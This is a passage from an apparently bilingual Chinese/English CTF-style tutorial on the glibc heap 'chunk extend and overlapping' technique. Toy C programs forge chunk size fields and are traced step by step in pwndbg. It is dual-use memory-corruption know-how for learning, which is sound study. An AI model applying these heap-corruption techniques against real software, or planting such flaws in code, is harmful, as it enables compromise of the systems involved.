ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x30</span>);<span class="hljs-comment">// 实现 extend,控制了第二个块的内容</span> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>Let us debug this in pwndbg and observe four things: the heap layout after the two malloc calls, the size field of chunk1 being changed to 0x41, chunk1 and chunk2 being treated as a single 0x40-byte chunk after free, and malloc(0x30) returning the chunk1+chunk2 block.</p><blockquote><p>I set breakpoints at <code>main+22</code> (where the first malloc returns), <code>main+36</code> (where the second malloc returns), <code>main+51</code> (right after chunk1's size field is set to 0x41), <code>main+58</code> (before free), <code>main+63</code> (after free) and <code>main+73</code> (right after malloc(0x30) returns the chunk1+chunk2 block, before the result is stored in ptr1).</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> disassemble mainDump of assembler code <span class="hljs-keyword">for</span> <span class="hljs-keyword">function</span> main: 0x0000000000401156 <+0>: endbr64 0x000000000040115a <+4>: push rbp 0x000000000040115b <+5>: mov rbp,rsp 0x000000000040115e <+8>: sub rsp,0x10 0x0000000000401162 <+12>: mov edi,0x10 0x0000000000401167 <+17>: call 0x401060 <malloc@plt> 0x000000000040116c <+22>: mov QWORD PTR [rbp-0x8],rax 0x0000000000401170 <+26>: mov edi,0x10 0x0000000000401175 <+31>: call 0x401060 <malloc@plt> 0x000000000040117a <+36>: mov rax,QWORD PTR [rbp-0x8] 0x000000000040117e <+40>: sub rax,0x8 0x0000000000401182 <+44>: mov QWORD PTR [rax],0x41 0x0000000000401189 <+51>: mov rax,QWORD PTR [rbp-0x8] 0x000000000040118d <+55>: mov rdi,rax 0x0000000000401190 <+58>: call 0x401050 <free@plt> 0x0000000000401195 <+63>: mov edi,0x30 0x000000000040119a <+68>: call 0x401060 <malloc@plt> 0x000000000040119f <+73>: mov QWORD PTR [rbp-0x10],rax 0x00000000004011a3 <+77>: mov eax,0x0 0x00000000004011a8 <+82>: leave 0x00000000004011a9 <+83>: retEnd of assembler dump.pwndbg> b *main+22Breakpoint 1 at 0x40116c: file main.c, line 7.pwndbg> b *main+36Breakpoint 2 at 0x40117a: file main.c, line 10.pwndbg> b *main+51Breakpoint 3 at 0x401189: file main.c, 
line 12.pwndbg> b *main+58Breakpoint 4 at 0x401190: file main.c, line 12.pwndbg> b *main+63Breakpoint 5 at 0x401195: file main.c, line 13.pwndbg> b *main+73Breakpoint 6 at 0x40119f: file main.c, line 13.pwndbg></code></pre></div><blockquote><p>其实我这里的多下了一个断点,所以我这里c了一次</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> cContinuing.Breakpoint 2, main () at main.c:1010 *(long long *)((long long)ptr-<span class="hljs-number">0</span>x8)=<span class="hljs-number">0</span>x41;// 修改第一个块的size域LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA─────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────*RAX <span class="hljs-number">0</span>x4042c0 ◂— <span class="hljs-number">0</span> RBX <span class="hljs-number">0</span> RCX <span class="hljs-number">0</span>x21 RDX <span class="hljs-number">0</span> RDI <span class="hljs-number">0</span>*RSI <span class="hljs-number">0</span>x4042d0 ◂— <span class="hljs-number">0</span> R8 <span class="hljs-number">0</span>x21001*R9 <span class="hljs-number">0</span>x4042c0 ◂— <span class="hljs-number">0</span> R10 <span class="hljs-number">0</span>xfffffffffffff000 R11 <span class="hljs-number">0</span>x7ffff7e1ace0 (main_arena+<span class="hljs-number">96</span>) —▸ <span class="hljs-number">0</span>x4042d0 ◂— <span class="hljs-number">0</span> R12 <span class="hljs-number">0</span>x7fffffffdcf8 —▸ <span class="hljs-number">0</span>x7fffffffdfb5 ◂— <span class="hljs-number">0</span>x657a2f656d6f682f ('/home/ze') R13 <span class="hljs-number">0</span>x401156 (main) ◂— endbr64 R14 <span class="hljs-number">0</span>x4030e8 (__do_global_dtors_aux_fini_array_entry) —▸ <span class="hljs-number">0</span>x401120 (__do_global_dtors_aux) ◂— endbr64 R15 <span class="hljs-number">0</span>x7ffff7ffd040 (_rtld_global) —▸ <span class="hljs-number">0</span>x7ffff7ffe2e0 ◂— <span 
class="hljs-number">0</span> RBP <span class="hljs-number">0</span>x7fffffffdbe0 ◂— <span class="hljs-number">1</span> RSP <span class="hljs-number">0</span>x7fffffffdbd0 {ptr1} ◂— <span class="hljs-number">0</span>x1000*RIP <span class="hljs-number">0</span>x40117a (main+<span class="hljs-number">36</span>) ◂— mov rax, qword ptr [rbp - <span class="hljs-number">8</span>]──────────────────────────────────────────────────────────────────────────────[ DISASM / x86-<span class="hljs-number">64</span> / set emulate on ]───────────────────────────────────────────────────────────────────────────────b+ <span class="hljs-number">0</span>x40116c <main+<span class="hljs-number">22</span>> mov qword ptr [rbp - <span class="hljs-number">8</span>], rax [{ptr}] <= <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span> <span class="hljs-number">0</span>x401170 <main+<span class="hljs-number">26</span>> mov edi, <span class="hljs-number">0</span>x10 EDI => <span class="hljs-number">0</span>x10 <span class="hljs-number">0</span>x401175 <main+<span class="hljs-number">31</span>> call malloc@plt <malloc@plt> ► <span class="hljs-number">0</span>x40117a <main+<span class="hljs-number">36</span>> mov rax, qword ptr [rbp - <span class="hljs-number">8</span>] RAX, [{ptr}] => <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span> <span class="hljs-number">0</span>x40117e <main+<span class="hljs-number">40</span>> sub rax, <span class="hljs-number">8</span> RAX => <span class="hljs-number">0</span>x404298 (<span class="hljs-number">0</span>x4042a0 - <span class="hljs-number">0</span>x8) <span class="hljs-number">0</span>x401182 <main+<span class="hljs-number">44</span>> mov qword ptr [rax], <span class="hljs-number">0</span>x41 [<span class="hljs-number">0</span>x404298] <= <span class="hljs-number">0</span>x41b+ <span class="hljs-number">0</span>x401189 <main+<span class="hljs-number">51</span>> mov rax, qword ptr [rbp - <span 
class="hljs-number">8</span>] RAX, [{ptr}] => <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span> <span class="hljs-number">0</span>x40118d <main+<span class="hljs-number">55</span>> mov rdi, rax RDI => <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span>b+ <span class="hljs-number">0</span>x401190 <main+<span class="hljs-number">58</span>> call free@plt <free@plt>b+ <span class="hljs-number">0</span>x401195 <main+<span class="hljs-number">63</span>> mov edi, <span class="hljs-number">0</span>x30 EDI => <span class="hljs-number">0</span>x30 <span class="hljs-number">0</span>x40119a <main+<span class="hljs-number">68</span>> call malloc@plt <malloc@plt>────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────────────In file: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/对inuse的fastbin进行extend/main.c:<span class="hljs-number">10</span> <span class="hljs-number">5</span> void *ptr,*ptr1; <span class="hljs-number">6</span> <span class="hljs-number">7</span> ptr=malloc(<span class="hljs-number">0</span>x10);//分配第一个<span class="hljs-number">0</span>x10的chunk <span class="hljs-number">8</span> malloc(<span class="hljs-number">0</span>x10);//分配第二个<span class="hljs-number">0</span>x10的chunk <span class="hljs-number">9</span> ► <span class="hljs-number">10</span> *(long long *)((long long)ptr-<span class="hljs-number">0</span>x8)=<span class="hljs-number">0</span>x41;// 修改第一个块的size域 <span class="hljs-number">11</span> <span class="hljs-number">12</span> free(ptr); <span class="hljs-number">13</span> ptr1=malloc(<span class="hljs-number">0</span>x30);// 实现 extend,控制了第二个块的内容 <span class="hljs-number">14</span> return <span class="hljs-number">0</span>; <span class="hljs-number">15</span> 
}────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────────<span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│ rsp <span class="hljs-number">0</span>x7fffffffdbd0 {ptr1} ◂— <span class="hljs-number">0</span>x1000<span class="hljs-number">01</span>:<span class="hljs-number">0008</span>│-<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbd8 {ptr} —▸ <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span><span class="hljs-number">02</span>:<span class="hljs-number">0010</span>│ rbp <span class="hljs-number">0</span>x7fffffffdbe0 ◂— <span class="hljs-number">1</span><span class="hljs-number">03</span>:<span class="hljs-number">0018</span>│+<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbe8 —▸ <span class="hljs-number">0</span>x7ffff7c29d90 (__libc_start_call_main+<span class="hljs-number">128</span>) ◂— mov edi, eax<span class="hljs-number">04</span>:<span class="hljs-number">0020</span>│+<span class="hljs-number">010</span> <span class="hljs-number">0</span>x7fffffffdbf0 ◂— <span class="hljs-number">0</span><span class="hljs-number">05</span>:<span class="hljs-number">0028</span>│+<span class="hljs-number">018</span> <span class="hljs-number">0</span>x7fffffffdbf8 —▸ <span class="hljs-number">0</span>x401156 (main) ◂— endbr64<span class="hljs-number">06</span>:<span class="hljs-number">0030</span>│+<span class="hljs-number">020</span> <span class="hljs-number">0</span>x7fffffffdc00 ◂— <span class="hljs-number">0</span>x1ffffdce0<span class="hljs-number">07</span>:<span class="hljs-number">0038</span>│+<span class="hljs-number">028</span> <span class="hljs-number">0</span>x7fffffffdc08 —▸ <span class="hljs-number">0</span>x7fffffffdcf8 —▸ <span class="hljs-number">0</span>x7fffffffdfb5 ◂— <span 
class="hljs-number">0</span>x657a2f656d6f682f ('/home/ze')──────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────── ► <span class="hljs-number">0</span> <span class="hljs-number">0</span>x40117a main+<span class="hljs-number">36</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>x7ffff7c29d90 __libc_start_call_main+<span class="hljs-number">128</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span>x7ffff7c29e40 __libc_start_main+<span class="hljs-number">128</span> <span class="hljs-number">3</span> <span class="hljs-number">0</span>x401095 _start+<span class="hljs-number">37</span>─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> x/<span class="hljs-number">10</span>gx <span class="hljs-number">0</span>x4042a0<span class="hljs-number">0</span>x4042a0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x4042b0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000021<span class="hljs-number">0</span>x4042c0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x4042d0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000020d31<span class="hljs-number">0</span>x4042e0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000pwndbg></code></pre></div><p>当两个 malloc 语句执行之后,堆的内存分布如上;</p><p>之后,我们把 chunk1 的 size 域更改为 0x41,0x41 是因为 chunk 的 size 域包含了用户控制的大小和 header 的大小。如上所示正好大小为 0x40。在题目中这一步可以由堆溢出得到。</p><div class="code-wrapper"><pre><code 
class="hljs bash">pwndbg> nBreakpoint 4, 0x0000000000401190 <span class="hljs-keyword">in</span> main () at main.c:1212 free(ptr);LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA─────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────*RAX 0x4042a0 ◂— 0 RBX 0 RCX 0x21 RDX 0*RDI 0x4042a0 ◂— 0 RSI 0x4042d0 ◂— 0 R8 0x21001 R9 0x4042c0 ◂— 0 R10 0xfffffffffffff000 R11 0x7ffff7e1ace0 (main_arena+96) —▸ 0x4042d0 ◂— 0 R12 0x7fffffffdcf8 —▸ 0x7fffffffdfb5 ◂— 0x657a2f656d6f682f (<span class="hljs-string">'/home/ze'</span>) R13 0x401156 (main) ◂— endbr64 R14 0x4030e8 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401120 (__do_global_dtors_aux) ◂— endbr64 R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0 RBP 0x7fffffffdbe0 ◂— 1 RSP 0x7fffffffdbd0 {ptr1} ◂— 0x1000*RIP 0x401190 (main+58) ◂— call free@plt──────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / <span class="hljs-built_in">set</span> <span class="hljs-built_in">emulate</span> on ]───────────────────────────────────────────────────────────────────────────────b+ 0x40117a <main+36> mov rax, qword ptr [rbp - 8] RAX, [{ptr}] => 0x4042a0 ◂— 0 0x40117e <main+40> sub rax, 8 RAX => 0x404298 (0x4042a0 - 0x8) 0x401182 <main+44> mov qword ptr [rax], 0x41 [0x404298] <= 0x41b+ 0x401189 <main+51> mov rax, qword ptr [rbp - 8] RAX, [{ptr}] => 0x4042a0 ◂— 0 0x40118d <main+55> mov rdi, rax RDI => 0x4042a0 ◂— 0 ► 0x401190 <main+58> call free@plt <free@plt> ptr: 0x4042a0 ◂— 0b+ 0x401195 <main+63> mov edi, 0x30 EDI => 0x30 0x40119a <main+68> call malloc@plt <malloc@plt>b+ 0x40119f <main+73> mov qword ptr [rbp - 0x10], rax 0x4011a3 <main+77> mov eax, 0 EAX => 0 0x4011a8 <main+82> leave────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) 
]────────────────────────────────────────────────────────────────────────────────────────In file: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/对inuse的fastbin进行extend/main.c:12 7 ptr=malloc(0x10);//分配第一个0x10的chunk 8 malloc(0x10);//分配第二个0x10的chunk 9 10 *(long long *)((long long)ptr-<span class="hljs-number">0</span>x8)=<span class="hljs-number">0</span>x41;// 修改第一个块的size域 <span class="hljs-number">11</span> ► <span class="hljs-number">12</span> free(ptr); <span class="hljs-number">13</span> ptr1=malloc(<span class="hljs-number">0</span>x30);// 实现 extend,控制了第二个块的内容 <span class="hljs-number">14</span> return <span class="hljs-number">0</span>; <span class="hljs-number">15</span> }────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────────<span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│ rsp <span class="hljs-number">0</span>x7fffffffdbd0 {ptr1} ◂— <span class="hljs-number">0</span>x1000<span class="hljs-number">01</span>:<span class="hljs-number">0008</span>│-<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbd8 {ptr} —▸ <span class="hljs-number">0</span>x4042a0 ◂— <span class="hljs-number">0</span><span class="hljs-number">02</span>:<span class="hljs-number">0010</span>│ rbp <span class="hljs-number">0</span>x7fffffffdbe0 ◂— <span class="hljs-number">1</span><span class="hljs-number">03</span>:<span class="hljs-number">0018</span>│+<span class="hljs-number">008</span> <span class="hljs-number">0</span>x7fffffffdbe8 —▸ <span class="hljs-number">0</span>x7ffff7c29d90 (__libc_start_call_main+<span class="hljs-number">128</span>) ◂— mov edi, eax<span class="hljs-number">04</span>:<span class="hljs-number">0020</span>│+<span class="hljs-number">010</span> <span class="hljs-number">0</span>x7fffffffdbf0 ◂— <span class="hljs-number">0</span><span 
class="hljs-number">05</span>:<span class="hljs-number">0028</span>│+<span class="hljs-number">018</span> <span class="hljs-number">0</span>x7fffffffdbf8 —▸ <span class="hljs-number">0</span>x401156 (main) ◂— endbr64<span class="hljs-number">06</span>:<span class="hljs-number">0030</span>│+<span class="hljs-number">020</span> <span class="hljs-number">0</span>x7fffffffdc00 ◂— <span class="hljs-number">0</span>x1ffffdce0<span class="hljs-number">07</span>:<span class="hljs-number">0038</span>│+<span class="hljs-number">028</span> <span class="hljs-number">0</span>x7fffffffdc08 —▸ <span class="hljs-number">0</span>x7fffffffdcf8 —▸ <span class="hljs-number">0</span>x7fffffffdfb5 ◂— <span class="hljs-number">0</span>x657a2f656d6f682f ('/home/ze')──────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────── ► <span class="hljs-number">0</span> <span class="hljs-number">0</span>x401190 main+<span class="hljs-number">58</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>x7ffff7c29d90 __libc_start_call_main+<span class="hljs-number">128</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span>x7ffff7c29e40 __libc_start_main+<span class="hljs-number">128</span> <span class="hljs-number">3</span> <span class="hljs-number">0</span>x401095 _start+<span class="hljs-number">37</span>pwndbg> x/<span class="hljs-number">4</span>gx <span class="hljs-number">0</span>x404290<span class="hljs-number">0</span>x404290: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000041<span class="hljs-number">0</span>x4042a0: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000</code></pre></div><blockquote><p>这里小回顾一下chunk的结构,就可以解释为什么是看 <code>0x404290</code> 
这个地址了(这个地址是chunk的prev_size,而我们修改的就是size域),下面是一张参考图:</p></blockquote><p><img src="/images/chunk_extend_overlapping/1.png" alt="Current chunk layout"></p><p>After free runs, chunk1 and chunk2 are released together as a single chunk of size 0x40 (on this glibc it lands in the 0x40 tcache bin):</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> bins
tcachebins
0x40 [ 1]: 0x4042a0 ◂— 0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty</code></pre></div><p>A subsequent malloc(0x30) then returns a block that spans chunk1 + chunk2, so we can write directly into chunk2's contents. This state is called an overlapping chunk.</p><h3 id="基本示例-2:对-inuse-的-smallbin-进行-extend">Basic example 2: extending an in-use smallbin chunk</h3><p>From the earlier material on heap internals, we know that a freed chunk in the fastbin size range is placed on a fastbin list, while a freed chunk outside that range is placed on the unsorted bin list. The following example allocates with a request size of 0x80 (for comparison, the largest fastbin chunk by default has a usable range of 0x70).</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">// gcc -g test2.c -o test2</span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span>
<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {
    <span class="hljs-type">void</span> *test, *test1;
    test = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x80</span>); <span class="hljs-comment">// allocate chunk1 (request size 0x80)</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// allocate chunk2 (request size 0x10)</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// guard chunk: prevents merging with the top chunk</span>
    *(<span class="hljs-type">long</span>*)((<span class="hljs-type">long</span>)test<span class="hljs-number">-0x8</span>) = <span class="hljs-number">0xb1</span>; <span class="hljs-comment">// overwrite chunk1's size field so that it covers chunk2</span>
    <span class="hljs-built_in">free</span>(test);
    test1 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0xa0</span>);
}</code></pre></div><p>在这个例子中,因为分配的 size 不处于 fastbin 的范围,因此在释放时如果与 top chunk 相连会导致和 top chunk 合并。所以我们需要额外分配一个 chunk,把释放的块与 top chunk 
隔开。</p><p>我们进gdb中观察一下:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> b 9Breakpoint 1 at 0x11a6: file main.c, line 9.pwndbg> r·········────────────────────────────────────────────────────────────────────────────────────────In file: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/对inuse的smallbin进行extend/main.c:9 4 int <span class="hljs-function"><span class="hljs-title">main</span></span>() { 5 void *<span class="hljs-built_in">test</span>, *test1; 6 <span class="hljs-built_in">test</span> = malloc(0x80); // 分配第一个 0x80 的chunk1 7 malloc(0x10); // 分配第二个 0x10 的chunk2s 8 malloc(0x10); // 防止与top chunk合并 ► 9 *(long*)((long)test-<span class="hljs-number">0</span>x8) = <span class="hljs-number">0</span>xb1; <span class="hljs-number">10</span> free(test); <span class="hljs-number">11</span> test1 = malloc(<span class="hljs-number">0</span>xa0); <span class="hljs-number">12</span> }·········────────────────────────────────────────────────────────────────────────────────────────────pwndbg> i r raxrax <span class="hljs-number">0</span>x555555559298 <span class="hljs-number">93824992252568</span>pwndbg> x/<span class="hljs-number">30</span>gx <span class="hljs-number">0</span>x555555559298<span class="hljs-number">0</span>x555555559298: <span class="hljs-number">0</span>x00000000000000b1 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592a8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592b8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592c8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592d8: <span class="hljs-number">0</span>x0000000000000000 <span 
class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592e8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x5555555592f8: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559308: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559318: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559328: <span class="hljs-number">0</span>x0000000000000021 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559338: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559348: <span class="hljs-number">0</span>x0000000000000021 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559358: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559368: <span class="hljs-number">0</span>x0000000000020ca1 <span class="hljs-number">0</span>x0000000000000000<span class="hljs-number">0</span>x555555559378: <span class="hljs-number">0</span>x0000000000000000 <span class="hljs-number">0</span>x0000000000000000</code></pre></div><p>其中,chunk1如下:</p><div class="code-wrapper"><pre><code class="hljs bash">0x555555559298: 0x00000000000000b1 0x00000000000000000x5555555592a8: 0x0000000000000000 0x00000000000000000x5555555592b8: 0x0000000000000000 0x00000000000000000x5555555592c8: 0x0000000000000000 0x00000000000000000x5555555592d8: 0x0000000000000000 0x00000000000000000x5555555592e8: 0x0000000000000000 0x00000000000000000x5555555592f8: 
0x0000000000000000 0x0000000000000000
0x555555559308: 0x0000000000000000 0x0000000000000000
0x555555559318: 0x0000000000000000 0x0000000000000000</code></pre></div><p>chunk2:</p><div class="code-wrapper"><pre><code class="hljs bash">0x555555559328: 0x0000000000000021 0x0000000000000000
0x555555559338: 0x0000000000000000 0x0000000000000000</code></pre></div><p>The guard chunk that isolates the others from the top chunk (the chunk right after it is the top chunk):</p><div class="code-wrapper"><pre><code class="hljs bash">0x555555559348: 0x0000000000000021 0x0000000000000000
0x555555559358: 0x0000000000000000 0x0000000000000000</code></pre></div><p>Next, set a breakpoint at line 10 so that <code>*(long*)((long)test-0x8) = 0xb1;</code> has executed. The dump below was captured after free(test) had run as well:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/30gx 0x555555559298
0x555555559298: 0x00000000000000b1 0x0000000555555559
0x5555555592a8: 0xe1643fe79a375a5e 0x0000000000000000
0x5555555592b8: 0x0000000000000000 0x0000000000000000
0x5555555592c8: 0x0000000000000000 0x0000000000000000
0x5555555592d8: 0x0000000000000000 0x0000000000000000
0x5555555592e8: 0x0000000000000000 0x0000000000000000
0x5555555592f8: 0x0000000000000000 0x0000000000000000
0x555555559308: 0x0000000000000000 0x0000000000000000
0x555555559318: 0x0000000000000000 0x0000000000000000
0x555555559328: 0x0000000000000021 0x0000000000000000
0x555555559338: 0x0000000000000000 0x0000000000000000
0x555555559348: 0x0000000000000021 0x0000000000000000
0x555555559358: 0x0000000000000000 0x0000000000000000
0x555555559368: 0x0000000000020ca1 0x0000000000000000
0x555555559378: 0x0000000000000000 0x0000000000000000
pwndbg> bin
Ambiguous <span class="hljs-built_in">command</span> <span class="hljs-string">"bin"</span>: binder, bins.
pwndbg> bins
tcachebins
0xb0 [ 1]: 0x5555555592a0 ◂— 0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty
pwndbg>
tcachebins
0xb0 [ 1]: 0x5555555592a0 ◂— 0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty
pwndbg></code></pre></div><p>This is not the result the reference articles describe: the chunk went into the 0xb0 entry of <code>tcachebins</code> instead of the unsorted bin. That is what a newer glibc does, since tcache (glibc 2.26 and later) takes freed chunks of this size first. The two non-zero values at the start of chunk1's user data appear to be the tcache next pointer and key that free writes there. The forged size 0xb0 was still honored, so the idea carries over, and we can follow the rest with the figures from the reference articles:</p><p><img 
src="/images/chunk_extend_overlapping/2.png" alt="Chunk layout after execution"></p><p>As in the previous example, <code>*(long*)((long)test-0x8) = 0xb1;</code> rewrites chunk1's size field, growing the chunk from 0x90 to 0xb0, so chunk1 now contains chunk2. Next we break at line 11, after chunk1 has been freed:</p><p><img src="/images/chunk_extend_overlapping/3.png" alt="Chunk layout and bins after chunk1 is freed"></p><p>Why does the chunk go into the unsorted bin here? A chunk enters the unsorted bin in two cases:</p><ul><li>When a larger chunk is split in two and the remainder is larger than MINSIZE, the remainder is placed in the unsorted bin.</li><li>When a chunk that does not belong to a fast bin is freed and is not adjacent to the top chunk, it is first placed in the unsorted bin.</li></ul><p>This example matches the second case: the freed chunk is outside the fastbin range and is not adjacent to the top chunk. It is otherwise much like the first example. Because the merged chunk1 + chunk2 is larger than the largest size a fast bin accepts, it does not go into a fast bin. In addition, the prev_inuse bit in chunk3's size field becomes 0, marking the preceding chunk (chunk2) as free. The rest of the process is the same: a new request for a 0xa0 chunk is served from the unsorted bin and chunk2's contents come along with it, so writing through the new chunk1 pointer lets us manipulate chunk2.</p><h3 id="基本示例-3:对-free-的-smallbin-进行-extend">Basic example 3: extending a freed smallbin chunk</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">// gcc -g test3.c -o test3</span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span>
<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {
    <span class="hljs-type">void</span> *test, *test1;
    test = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x80</span>); <span class="hljs-comment">// allocate chunk1 (request size 0x80)</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// allocate chunk2 (request size 0x10)</span>
    <span class="hljs-built_in">free</span>(test); <span class="hljs-comment">// free first, so that chunk1 enters the unsorted bin</span>
    *(<span class="hljs-type">long</span> *)((<span class="hljs-type">long</span>)test - <span class="hljs-number">0x8</span>) = <span class="hljs-number">0xb1</span>; <span class="hljs-comment">// then overwrite the size field of the freed chunk1</span>
    test1 = <span class="hljs-built_in">malloc</span>(<span 
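class="hljs-number">0xa0</span>);
}</code></pre></div><p>The third example differs from the first two: they modify chunk1's size and then free it, whereas this one frees chunk1 first and then rewrites its size. Going step by step again, first break at line 8 so that the program has finished allocating the chunks:</p><p><img src="/images/chunk_extend_overlapping/4.png" alt="Chunk layout after the allocations"></p><p>Next, break at line 9 so that chunk1 has been freed:</p><p><img src="/images/chunk_extend_overlapping/5.png" alt="Chunk layout after chunk1 is freed"></p><p>As expected, the freed chunk1 goes into the unsorted bin. Next we move the breakpoint to line 10. Note that this time the size is modified after the free:</p><p><img src="/images/chunk_extend_overlapping/6.png" alt="Chunk layout after the size is modified following the free"></p><p>A malloc at this point returns a block covering chunk1 + chunk2, which gives control over chunk2's contents.</p><blockquote><p>After the size is changed, the new 0xa0 request is served from the unsorted bin. The takeaway is that a bin only stores the address of each chunk; how large the chunk is gets decided by reading the chunk's own size field. That is why the new allocation still gives control over chunk2.</p></blockquote><h3 id="基本示例-4:通过-extend-后向-overlapping">Basic example 4: backward overlapping via extend</h3><p>This example uses extend to produce a backward overlap, which is the most common case in CTF challenges. The overlap can then be used to build other exploits.</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span>
<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>
{
    <span class="hljs-type">void</span> *ptr,*ptr1;
    ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// allocate chunk1 (request size 0x10)</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// allocate chunk2 (request size 0x10)</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// allocate chunk3 (request size 0x10)</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>); <span class="hljs-comment">// allocate chunk4 (request size 0x10)</span>
    <span class="hljs-comment">// overwrite chunk1's size field; the casts are 64-bit because an int cast would truncate the pointer</span>
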